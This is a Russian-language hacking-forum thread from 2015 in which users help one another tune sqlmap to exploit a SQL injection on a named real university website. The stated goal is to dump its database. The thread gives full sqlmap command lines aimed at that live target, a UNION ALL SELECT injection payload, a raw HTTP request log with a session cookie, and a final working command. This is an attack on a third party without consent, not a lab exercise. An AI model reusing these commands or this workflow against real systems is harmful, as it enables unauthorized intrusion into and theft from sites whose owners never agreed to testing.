Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   [SQLmap] Не могу составить правильные настройки сканирования (https://forum.antichat.xyz/showthread.php?t=430658)

moddom 24.09.2015 16:55

Разбирабюсь с sqlmap.

Взял первую попавшуюся уязвимую ссылку: /threads/424558/page-3#post-3893898

и пытаюсь сканировать.

Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть.

Вот и не могу написать правильно, что бы нашлась именно union уязвимость.

Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ.

Код:

./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4

nopony 25.09.2015 00:49

Цитата:

Сообщение от moddom

Разбирабюсь с sqlmap.
Взял первую попавшуюся уязвимую ссылку:
/threads/424558/page-3#post-3893898
и пытаюсь сканировать.
Он находит только blind time based. Но, как понимаю, согласно ссылке выше, union определенно есть.
Вот и не могу написать правильно, что бы нашлась именно union уязвимость.
Если короче, то вот ожидаю, что такие параметры должны найти ее, плюс, немного оптимизировал, что бы время сканирования сократить. Хоть убей, но не могу понять, ЧЯДНТ.
Код:

./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 -D mysql -v 4


А что, если я скажу что на этом сайте нету бд mysql, возможно ты сделал опечатку и хотел написать вместо -D mysql --dbms=mysql, тогда скорее всего всё заработает

moddom 25.09.2015 10:36

Да, спасибо.

Как минимум, тут точно есть ошибка, но все равно это не помогает:

Более правильный вариант:

Код:

./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-col=20-30 --dbms=mysql -v 4

palec2006 27.09.2015 03:54

такие дупла тянут руками, или хавижем, нехрен тут скулмап городить

moddom 27.09.2015 13:05

Цитата:

Сообщение от palec2006

такие дупла тянут руками, или хавижем, нехрен тут скулмап городить

да, я понимаю, что тут и руками не сложно. Вот именно поэтому и взял простой пример, где понимаю, как все приосходит "руками", что бы разобраться на простом примере в работе sqlmap. Havij под win работает, а я сторонник *NIX систем. Ожидал, что sqlmap с легкостью справится с этой задачей. Да, блайндом можно вытянуть дамп, но это долго.

Вот и все еще хочу разобраться в нюансах sqlmap-а.

Все же был бы признателен, если кто-то подскажет, как же все таки правильно задать конфигурацию, что бы вытянуть дамп с поиощью sqlmap.

ghost8 29.09.2015 15:27

во первых добавь --current-db

во вторых смотри ещё в сторону --prefix --suffix

moddom 30.09.2015 11:50

sqlmap отправляет нужный запрос:

Код:

./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --threads=5
Код:

[10:52:10] [PAYLOAD] 239 UNION ALL SELECT 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500, 100500# --
[10:52:10] [TRAFFIC OUT] HTTP request [#5]:
GET /index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20-- HTTP/1.1
Accept-Encoding: identity
Cookie: fe_typo_user=3b6ec0176deabb1294c4e4b9940c4a45
Host: www.htw-dresden.de
Referer: https://www.htw-dresden.de:443/index.php
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8
Connection: close

но он не определяет его как "положительный".

Если просто руками вставить в адресную строку

Код:

https://www.htw-dresden.de/index.php?id=9147&vid=239%20UNION%20ALL%20SELECT%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%2C%20100500%23%20--
То все как бы отлично.

Но sqlmap не хочет говорить о том, что беда имеет место быть.

moddom 30.09.2015 12:07

Добавил --string и вуаля:

Код:

./sqlmap.py -p vid -u 'https://www.htw-dresden.de/index.php?id=9147&vid=239' --technique='U' --union-char="100500" --union-col=20-30 --dbms=mysql -v 4 --prefix="" --suffix="--" --current-db --level 4 --risk 3 --random-agent --flush-session --string="100500"


Время: 11:01